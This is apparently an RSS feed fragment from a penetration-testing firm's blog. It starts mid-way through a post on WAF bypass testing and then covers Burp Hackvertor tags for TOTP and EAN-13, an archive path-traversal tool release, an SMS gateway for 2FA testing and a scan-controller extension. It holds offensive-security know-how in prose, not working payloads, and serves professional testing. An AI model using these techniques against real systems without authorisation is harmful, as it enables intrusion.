&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-14" name="rest_code_313e8462ce9641868a3fb75914512cae-14" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-14"&gt;&lt;/a&gt;            &amp;lt;Product InstituteID="AAA" Language="de"&amp;gt;AAA&amp;lt;/Product&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-15" name="rest_code_313e8462ce9641868a3fb75914512cae-15" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-15"&gt;&lt;/a&gt;            &amp;lt;OrderDetails&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-16" name="rest_code_313e8462ce9641868a3fb75914512cae-16" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-16"&gt;&lt;/a&gt;                &amp;lt;OrderType&amp;gt;AAA&amp;lt;/OrderType&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-17" name="rest_code_313e8462ce9641868a3fb75914512cae-17" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-17"&gt;&lt;/a&gt;                &amp;lt;OrderAttribute&amp;gt;AAA&amp;lt;/OrderAttribute&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-18" name="rest_code_313e8462ce9641868a3fb75914512cae-18" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-18"&gt;&lt;/a&gt;            &amp;lt;/OrderDetails&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-19" name="rest_code_313e8462ce9641868a3fb75914512cae-19" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-19"&gt;&lt;/a&gt;            &amp;lt;SecurityMedium&amp;gt;0000&amp;lt;/SecurityMedium&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-20" name="rest_code_313e8462ce9641868a3fb75914512cae-20" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-20"&gt;&lt;/a&gt;        &amp;lt;/static&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-21" name="rest_code_313e8462ce9641868a3fb75914512cae-21" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-21"&gt;&lt;/a&gt;        &amp;lt;mutable/&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-22" name="rest_code_313e8462ce9641868a3fb75914512cae-22" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-22"&gt;&lt;/a&gt;    &amp;lt;/header&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-23" name="rest_code_313e8462ce9641868a3fb75914512cae-23" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-23"&gt;&lt;/a&gt;    &amp;lt;body&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-24" name="rest_code_313e8462ce9641868a3fb75914512cae-24" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-24"&gt;&lt;/a&gt;        &amp;lt;DataTransfer&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-25" name="rest_code_313e8462ce9641868a3fb75914512cae-25" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-25"&gt;&lt;/a&gt;            &amp;lt;OrderData&amp;gt;AAA&amp;lt;/OrderData&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-26" name="rest_code_313e8462ce9641868a3fb75914512cae-26" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-26"&gt;&lt;/a&gt;        &amp;lt;/DataTransfer&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-27" name="rest_code_313e8462ce9641868a3fb75914512cae-27" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-27"&gt;&lt;/a&gt;    &amp;lt;/body&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-28" name="rest_code_313e8462ce9641868a3fb75914512cae-28" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-28"&gt;&lt;/a&gt;&amp;lt;/ebicsUnsecuredRequest&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;While Airlock doesn't check file contents in-depth in general, it is &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/issues/2847"&gt;still an open issue for CRS&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="summary"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;The above results show what went through the Airlock WAF. But after looking at the above results, everyone can agree that it's not easy to tell what that means exactly and what is the right thing to do. Should Airlock block more? Are those useful attack strings? We decided that we do not want to pick apart all of the payloads and argue about them. We provide them for you as-is, so you can draw your own conclusions.&lt;/p&gt;
&lt;p&gt;After talking to Ergon, they opened internal tickets and said they are going to look at certain things from the above list. We agree that certain payloads are not yet full attacks, for other payloads we were expecting Airlock to block more.&lt;/p&gt;
&lt;p&gt;For CRS, one of the two mentioned issues is fixed; the other is still open.&lt;/p&gt;
&lt;p&gt;We have seen that Airlock did not block certain tests from CRS. Overall, it gave the impression of resulting in fewer false positives, as it seems to rather allow than block legitimate users. On the other hand, if you are looking for Server Side Request Forgery (SSRF) protection by default in URLs (URLs in URLs), you have to actively configure that when using Airlock. The impression of more false positives with CRS is probably in the nature of the project and again: whoever uses CRS must modify it to fit their needs. For example, if you use CRS and have users in Germany, &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/issues/3644"&gt;users with first name Axel could get pretty upset&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Depending on your preference, you can tweak your WAF to reduce either false positives or false negatives. Some people prefer a WAF without false negatives because otherwise it can be bypassed. Other people will prefer fewer false positives because they are afraid to block legitimate cases or do not want to invest the time to configure every use case. When trying to argue in either direction, we seem to run in circles.&lt;/p&gt;
&lt;p&gt;Are you upset about any of our statements above? See, we told you it's a controversial topic to talk about.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="thanks"&gt;
&lt;h2&gt;Thanks&lt;/h2&gt;
&lt;p&gt;We would like to thank our customer who was open to let us look at the WAF in a whitebox approach and who agreed to do a publication of the results. Thanks goes out to the OWASP CRS team who responded to all our questions on Slack. Thanks also to Ergon for the call and feedback.&lt;/p&gt;
&lt;aside class="footnote-list brackets"&gt;
&lt;aside class="footnote brackets" id="footnote-1" role="doc-footnote"&gt;
&lt;span class="label"&gt;&lt;span class="fn-bracket"&gt;[&lt;/span&gt;&lt;a role="doc-backlink" href="https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#footnote-reference-1"&gt;1&lt;/a&gt;&lt;span class="fn-bracket"&gt;]&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;42&lt;/p&gt;
&lt;/aside&gt;
&lt;/aside&gt;
&lt;/section&gt;</description><category>Airlock</category><category>CRS</category><category>OWASP</category><category>Pentesting</category><category>WAF</category><category>Web</category><guid>https://www.pentagrid.ch/en/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/</guid><pubDate>Wed, 11 Dec 2024 12:00:00 GMT</pubDate></item><item><title>Hackvertor EAN-13 and TOTP tags for web-application penetration testing with Burp</title><link>https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;Hackvertor is a &lt;a class="reference external" href="https://hackvertor.co.uk/"&gt;standalone tool&lt;/a&gt; and more importantly for us an &lt;a class="reference external" href="https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100"&gt;extension for the penetration testing tool Portswigger Burp Suite&lt;/a&gt; by &lt;a class="reference external" href="https://garethheyes.co.uk/"&gt;Gareth Heyes&lt;/a&gt; of the Portswigger Research team, which performs dynamic data conversions. For example, the tool can be used to encode data fields as Base64 before Burp sends a HTTP POST request to a server. This happens automatically and there is no need to manually convert anything or copy and pasting between different windows.&lt;/p&gt;
&lt;p&gt;We had an example in our blog, where we &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/"&gt;generated Swiss social security numbers for a pentest and explained how to program custom Hackvertor tags&lt;/a&gt;. There are all kinds of tags already available inside Hackvertor and users can also code their own custom tags. Nowadays Hackvertor has it's own &lt;a class="reference external" href="https://github.com/hackvertor/hackvertor/tree/master/tag-store"&gt;public tag store&lt;/a&gt;, where users can submit custom tags. Pentagrid provided two custom tags that made it into the Hackvertor tag store. One tag is for calculating the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/International_Article_Number#Check_digit"&gt;check-digit of EAN-13 numbers&lt;/a&gt; and another is for &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Time-based_one-time_password"&gt;Time-based one-time password (TOTP)&lt;/a&gt; calculation.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;As already explained in our blog post &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/"&gt;Teaching Burp a new HTTP Transport Encoding&lt;/a&gt;, being able to customise Burp like this is a helpful instrument to automate and increase test coverage during a security analysis.&lt;/p&gt;
&lt;section id="ean-13-hackvertor-tag"&gt;
&lt;h2&gt;EAN-13 Hackvertor tag&lt;/h2&gt;
&lt;p&gt;EAN is the European Article Number, a standard to encode article numbers. And while it became more international than European and is now called Global Trade Item Number, it is often still referred as EAN-13. Swiss AHV/AVS numbers use the check-sum calculation from EAN-13 and store the check-sum as the 13th digit.&lt;/p&gt;
&lt;p&gt;The custom tag code from our &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/"&gt;blog post&lt;/a&gt; was made available as a &lt;a class="reference external" href="https://github.com/hackvertor/hackvertor/pull/112/"&gt;Hackvertor tag in the tag store&lt;/a&gt;. To use the EAN-13 tag, see the following two examples:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_b83e705325f24e94b5a2143fdd9791ec-1" name="rest_code_b83e705325f24e94b5a2143fdd9791ec-1" href="https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/#rest_code_b83e705325f24e94b5a2143fdd9791ec-1"&gt;&lt;/a&gt;# the "append" parameter can be set to 0 or 1.
&lt;a id="rest_code_b83e705325f24e94b5a2143fdd9791ec-2" name="rest_code_b83e705325f24e94b5a2143fdd9791ec-2" href="https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/#rest_code_b83e705325f24e94b5a2143fdd9791ec-2"&gt;&lt;/a&gt;&amp;lt;@_ean13(1,'[...]')&amp;gt;756.9217.0769.8&amp;lt;/@_ean13&amp;gt; # -&amp;gt; 756.9217.0769.85
&lt;a id="rest_code_b83e705325f24e94b5a2143fdd9791ec-3" name="rest_code_b83e705325f24e94b5a2143fdd9791ec-3" href="https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/#rest_code_b83e705325f24e94b5a2143fdd9791ec-3"&gt;&lt;/a&gt;&amp;lt;@_ean13(0,'[...]')&amp;gt;756.9217.0769.8&amp;lt;/@_ean13&amp;gt; # -&amp;gt; 5
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The omission [...] is the place where a so-called Hackvertor code execution key must be inserted. The Hackvertor Burp extension will add the code execution key automatically, if the tags are used and prepared in the Hackvertor tab in the Burp UI. The execution key is a random 40-hex character string that prevents websites processed by Burp from triggering harmful actions. The code execution key is unique to your Burp application start. Only code execution tags (with custom code such as the ones in the tag store) require code execution keys.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="totp-hackvertor-tag"&gt;
&lt;h2&gt;TOTP Hackvertor tag&lt;/h2&gt;
&lt;p&gt;Pentagrid also implemented a TOTP tag. This time-based one-time password is used for second factor authentication. If such a second factor is required during the penetration test, this Hackvertor tag can be used. The code was recently &lt;a class="reference external" href="https://github.com/hackvertor/hackvertor/pull/121"&gt;added to the tag store&lt;/a&gt;. To use the TOTP tag, extract the seed from the QR code that was handed over to you to scan it with an authenticator app. The command line tool &lt;cite&gt;zbarimg&lt;/cite&gt; can dump QR code content from an image file:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_a537a9cac8cb42efbc062c990c6c2330-1" name="rest_code_a537a9cac8cb42efbc062c990c6c2330-1" href="https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/#rest_code_a537a9cac8cb42efbc062c990c6c2330-1"&gt;&lt;/a&gt;% zbarimg ~/Authenticator-QR-Code.png
&lt;a id="rest_code_a537a9cac8cb42efbc062c990c6c2330-2" name="rest_code_a537a9cac8cb42efbc062c990c6c2330-2" href="https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/#rest_code_a537a9cac8cb42efbc062c990c6c2330-2"&gt;&lt;/a&gt;QR-Code:otpauth://totp/SomeOrg:something?secret=MYSEEDMYSEED2342&amp;amp;issuer=SomeOrg
&lt;a id="rest_code_a537a9cac8cb42efbc062c990c6c2330-3" name="rest_code_a537a9cac8cb42efbc062c990c6c2330-3" href="https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/#rest_code_a537a9cac8cb42efbc062c990c6c2330-3"&gt;&lt;/a&gt;scanned 1 barcode symbols from 1 images in 0.05 seconds
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The tag can then be used analogue to this example:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_edbc1bfdeeca4d049640c71ae105314e-1" name="rest_code_edbc1bfdeeca4d049640c71ae105314e-1" href="https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/#rest_code_edbc1bfdeeca4d049640c71ae105314e-1"&gt;&lt;/a&gt;&amp;lt;@_totp('[...]')&amp;gt;MYSEEDMYSEED2342&amp;lt;/@_totp&amp;gt; # -&amp;gt; 797723
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There are several parameters for TOTP. In practise, the tag only supports the commonly used parameters SHA1, 30 seconds, 6 digits. Let us know if you find a different configuration in the wild, it should be fairly simple to adapt the custom tag in that case.&lt;/p&gt;
&lt;p&gt;In order to access the tag store, just go to the menu entry "View tag store" from the Hackvertor menu in Burp and install the plugins you want. Then also make sure to allow code execution tags via the menu entry "Allow code execution tags" from the Hackvertor menu in Burp.&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202412_hackvertor-tag-store.png"&gt;
&lt;img alt="Hackvertor tag store and installed custom tags in the background." class="align-center" src="https://www.pentagrid.ch/images/202412_hackvertor-tag-store.thumbnail.png"&gt;
&lt;/a&gt;
&lt;p&gt;Update 2025-06-04: An update of Hackvertor in 2025 changed the style of closing elements from &lt;cite&gt;&amp;lt;@/name&amp;gt;&lt;/cite&gt; to &lt;cite&gt;&amp;lt;/@name&amp;gt;&lt;/cite&gt;. Therefore, we updated the post.&lt;/p&gt;
&lt;/section&gt;</description><category>Burp</category><category>Hackvertor</category><category>Multi-Factor Authentication</category><category>OWASP</category><category>Pentesting</category><category>Portswigger</category><guid>https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/</guid><pubDate>Fri, 06 Dec 2024 08:42:00 GMT</pubDate></item><item><title>Archive Pwn tool released</title><link>https://www.pentagrid.ch/en/blog/archive-pwn-tool-release/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;When extracting archive formats there are many things that can go wrong. While some unarchiving tools and libraries protect from malicious archives that include path traversal attacks, other might not or at least not in the default configuration. We wrote a tool to create such archives with path traversal attacks in Python.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;Recently we've come across different web applications and embedded devices that allow archive formats such as zips, tars and cpio archives as user input. Therefore, it is always important to check if they are affected by path traversal attacks. If you don't know what we're talking about you might want to read about the &lt;a class="reference external" href="https://github.com/snyk/zip-slip-vulnerability"&gt;zip slip vulnerability&lt;/a&gt; or read our explanations in our &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/"&gt;Wind River VxWorks tarExtract directory traversal vulnerability (CVE-2023-38346)&lt;/a&gt; advisory.&lt;/p&gt;
&lt;p&gt;While there have been tools such as &lt;a class="reference external" href="https://github.com/0xless/slip"&gt;slip&lt;/a&gt; and &lt;a class="reference external" href="https://github.com/jwilk/traversal-archives"&gt;traversal-archives&lt;/a&gt;, we had some special use cases. Both tools and our new &lt;a class="reference external" href="https://github.com/pentagridsec/archive_pwn"&gt;Archive Pwn&lt;/a&gt; tool slightly vary in supported archive formats (zip, tar and cpio here), file formats (tar ustar, gnu tar, cpio newc, etc.) and implemented attacks (simple path traversal, symlink attacks, etc.).&lt;/p&gt;
&lt;p&gt;We encountered more complicated parsing routines that required us to create custom archives that already include a certain file structure. The analysed code sometimes unpacked a single file from the archive first and an error was thrown if the file was not present. However, the vulnerable code that would allow us to do a path traversal attack was later in the code. Therefore, we created &lt;a class="reference external" href="https://github.com/pentagridsec/archive_pwn"&gt;Archive Pwn&lt;/a&gt; that packs an entire folder into the archive before adding the attack payload entry.&lt;/p&gt;
&lt;p&gt;Most of the ideas came from looking at old vulnerabilities and specifications or the file formats in a hex editor and then implementing attacks such as maximum Windows path length attacks, unicode normalisation, DoS via very deep directories, including a path traversal in the filename included in .gz files, etc.&lt;/p&gt;
&lt;p&gt;Creating a tool that generates as many combinations of attacks as possible was as well important, so the output of the tool can serve as a test collection for unarchiving tools. You can unpack all archives the tool creates and check if you can find a file in a different directory than the unpacking location.&lt;/p&gt;
&lt;p&gt;We've also decided to make sure that we copy the tar and zip libraries from Python and slightly modify them, allowing us to implement further non-standard conform attacks in the future. There's an example in the README on the &lt;a class="reference external" href="https://github.com/pentagridsec/archive_pwn"&gt;Archive Pwn Github page&lt;/a&gt; on how to create your own malicious archives.&lt;/p&gt;
&lt;p&gt;The tool release is related to the recent advisories we released for &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/"&gt;Busybox cpio directory traversal vulnerability (CVE-2023-39810)&lt;/a&gt; and &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/"&gt;Wind River VxWorks tarExtract directory traversal vulnerability (CVE-2023-38346)&lt;/a&gt;, where especially the VxWorks blog post deep-dives into some of the archive vulnerabilities.&lt;/p&gt;</description><category>Directory Traversal</category><category>Exploit</category><category>Pentesting</category><category>Python</category><category>Tools</category><guid>https://www.pentagrid.ch/en/blog/archive-pwn-tool-release/</guid><pubDate>Tue, 03 Oct 2023 15:42:00 GMT</pubDate></item><item><title>An open source SMS gateway for pentest projects</title><link>https://www.pentagrid.ch/en/blog/open-source-sms-gateway-for-pentest-projects/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;Accounts for mobile applications are often bound to phone numbers and working with multiple people on a project may make it necessary at some point to share mobile phone numbers for receiving SMS. Also, when testing mobile applications protected by a SMS-based second-factor authentication, sharing phone numbers among the testing team is sometimes necessary and also acceptable regarding security, when the scope is only a test system. At Pentagrid, we therefore operate a small SMS Gateway, which we hereby publish as open source.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="motivation"&gt;
&lt;h2&gt;Motivation&lt;/h2&gt;
&lt;p&gt;If SMS is the second authentication factor, the target system sends an SMS to a mobile phone and then the auditor enters the token manually into the web-browser. While this is still somehow convenient for regular work, it is quite ineffective during a penetration test, especially when the server side invalidates the session every now and then, because the tested application does not like the input and just rejecting the HTTP request was not deemed sufficient enough for the software developers. And when a system is not designed to be tested with semi-automated tools such as the Burp Proxy, often enough 2FA couldn’t be just deactivated for certain test accounts even in a dedicated test environment. To be able to still test such a system, it is useful to bring the second factor into the Burp Proxy.&lt;/p&gt;
&lt;p&gt;There are many commercial SMS gateways that provide an API for sending and receiving SMS. However, since the token is an authentication factor, even if only a part of the whole process, sharing this sensitive information with third parties is not an option, even for test systems. For this reason, we implemented an SMS gateway to avoid as much third-party infrastructure in between as possible.&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202212_photo_modem_pool.jpg"&gt;
&lt;img alt="Modem pool with multiple SIM cards" class="align-center" src="https://www.pentagrid.ch/images/202212_photo_modem_pool.thumbnail.jpg"&gt;
&lt;/a&gt;
&lt;/section&gt;
&lt;section id="approach"&gt;
&lt;h2&gt;Approach&lt;/h2&gt;
&lt;p&gt;There are a few SMS forwarding applications that, once installed on a mobile phone, will forward incoming SMS, usually to a destination E-mail address. This works, but the method has drawbacks. It increases dependencies and one has to additionally trust the application developer, the E-mail provider (if one relies on an external party for this), and in the end also other applications running on the mobile phone - at least to a certain degree. The approach additionally does not scale well. Generally, a phone may house up to two physical SIM cards. For three or more SIM cards additional phones would be required. Furthermore, service monitoring is not really supported. To check if the forwarding application is still working, the almost only way to test this is an end-to-end check, which includes sending an SMS and checking if the SMS was finally delivered to a destination.&lt;/p&gt;
&lt;p&gt;To overcome these drawbacks, we implemented an SMS gateway with the main purpose of receiving SMS. It is also possible to send SMS, which could be used for sending server monitoring alarm messages, but this was not the focus.&lt;/p&gt;
&lt;p&gt;In this initial release, the SMS gateway provides the following features:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Manage a batch of modems&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Receive and send SMS&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Forwarding of received SMS to E-mail&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Be able to pull SMS or send SMS via an XMLRPC service&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Support for sending Unstructured Supplementary Service Data (USSD) codes to top up prepaid SIM cards&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Support for TLS&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Icinga2/Nagios integration for deep checks&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Munin integration for a few stats&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="implementation-and-operation-mode"&gt;
&lt;h2&gt;Implementation and operation mode&lt;/h2&gt;
&lt;p&gt;The SMS gateway is implemented as a Python program for Linux. The module &lt;a class="reference external" href="https://github.com/babca/python-gsmmodem/tree/master/gsmmodem"&gt;python-gsmmodem&lt;/a&gt; interfaces the modem and handles modem commands. Therefore, each modem runs in its own thread. Multiple modems are grouped as a modem pool, which allows us to operate multiple SIM cards in parallel. The modem pool monitors each modem’s health state, which includes the serial connection to the modem, the signal strength, and the account’s balance for pre-paid SIM cards. Furthermore, the modem pool tries to re-initialize modems in case of problems.&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202212_SMS_Gateway_Overview.png"&gt;
&lt;img alt="Overview of the SMS gateway's sub-modules" class="align-center" src="https://www.pentagrid.ch/images/202212_SMS_Gateway_Overview.thumbnail.png"&gt;
&lt;/a&gt;
&lt;p&gt;When a modem receives an SMS, it is put into an internal queue. A remote client fetches the SMS via an API provided by an XMLRPC server integrated into the SMS gateway, which is based on the network engine Twisted. Alternatively, the SMS gateway is able to deliver incoming SMS via SMTPS to a destination mailbox. The SMS forwarding via SMTPS is also monitored as a health check. If there are is a problem with SMTPS connection, the health check subsequentially fails.&lt;/p&gt;
&lt;p&gt;Remote XMLRPC clients may interact with the XMLRPC server. A client can fetch a received SMS. The API is kept simple and there is no user management. Instead, the XMLRPC server authorizes operations based on API token the client passes as parameter when calling remote API functions. The server has the API token stored as a hash in a configuration file and checks it when deciding whether or not to authorize an operation. There are API token for generally fetching SMS, for fetching SMS for individual modems, for sending Unstructured Supplementary Service Data (USSD) codes, for sending SMS, for retrieving an SMS delivery status, and for monitoring and statistics purposes.&lt;/p&gt;
&lt;p&gt;The SMS gateway is shipped with a Munin and an Icinga/Nagios plugin to support monitoring, when the solution is operated. The monitoring plugins are implemented as XMLRPC clients that retrieve health information respectively statistics from the XMLRPC server.&lt;/p&gt;
&lt;p&gt;The SMS gateway also supports sending SMS. But when other people are allowed to send SMS, nothing stops them from sending messages to expensive service lines and changing booking options. Therefore, sending SMS can be restricted via an allowed destinations prefix list.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="set-up-an-own-installation"&gt;
&lt;h2&gt;Set up an own installation&lt;/h2&gt;
&lt;p&gt;We published the SMS gateway’s source code on &lt;a class="reference external" href="https://github.com/pentagridsec/smsgate"&gt;Github&lt;/a&gt; along with further documentation how to set up such a gateway. It should support many 2G/3G/4G/5G modems. In a simple case, you could use these plastic USB modem sticks that are sometimes called "surfstick" or similar.&lt;/p&gt;
&lt;p&gt;How you can use the SMS gateway in an automated way with Portswigger's Burp Suite so you don't have to type the 2FA anymore is explained in the blog post &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/"&gt;Burp Suite - solving E-mail and SMS TAN multi-factor authentication with Hackvertor custom tags&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;</description><category>API</category><category>Multi-Factor Authentication</category><category>Pentesting</category><category>Python</category><category>SMS</category><category>Tools</category><guid>https://www.pentagrid.ch/en/blog/open-source-sms-gateway-for-pentest-projects/</guid><pubDate>Tue, 06 Dec 2022 08:23:00 GMT</pubDate></item><item><title>Improving web application security testing with the Pentagrid Scan Controller</title><link>https://www.pentagrid.ch/en/blog/improving-web-application-security-testing-with-pentagrid-scan-controller/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;We're back with another helpful Portswigger Burp Pro Proxy extension that you shouldn't miss if you do web application security analysis. This time the wasteful approach of Burp's feature "Actively scan all in-scope traffic" triggered the development of a new extension called Pentagrid Scan Controller, because there are several improvements possible and desirable.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;For example, Burp's default scanner actively scans static resources on the server, which seems useless in many cases, so the extension will not do that by default. But the power of the extension lies in all the configuration, you can do yourself to improve the automatic active scanning by deciding what should be scanned and what shouldn't. It also takes the entire concept one level higher up, because you define what you think are interesting HTTP requests and what not. This allows the extension to show you a ranked view of requests and as a tester you now know where to spend the rest of your manual testing time after Burp's scanner ran. Another improvement is in the area of repeatability of requests. The extension will figure out if a requests is repeatable at all (because that's necessary to do proper scanning). If a request is not repeatable it will be made repeatable or ignored (you can see the decision in the UI), because there is usually no point in scanning non-repeatable requests.&lt;/p&gt;
&lt;p&gt;You can head over to the &lt;a class="reference external" href="https://github.com/pentagridsec/PentagridScanController"&gt;Pentagrid Scan Controller github page&lt;/a&gt;, where the extension was published as open source. Visit the official &lt;a class="reference external" href="https://portswigger.net/bappstore/e3dde890bdce4ae4bcef0d97019f5d46"&gt;Burp BApp store page of Pentagrid Scan Controller&lt;/a&gt; or load it directly inside Burp Pro via the BApp store. We recommend to watch the &lt;a class="reference external" href="https://www.youtube.com/watch?v=aFMTzFfX1Z4"&gt;area41.io talk of Tobias Ospelt about improving web application scanning&lt;/a&gt; which explains the issues of Burp scanner, what the extension will improve and how you can use the extension. If you want to skip to the extension part directly, you can watch the &lt;a class="reference external" href="https://youtu.be/aFMTzFfX1Z4?t=1460"&gt;talk from 24:20 min&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The extension version 0.1 already has many features, such as:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Scanning only in-scope items&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Different deduplication techniques of items already scanned&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Ignoring requests if the URL or the entire request matches a certain regex&lt;/p&gt;&lt;/li&gt;
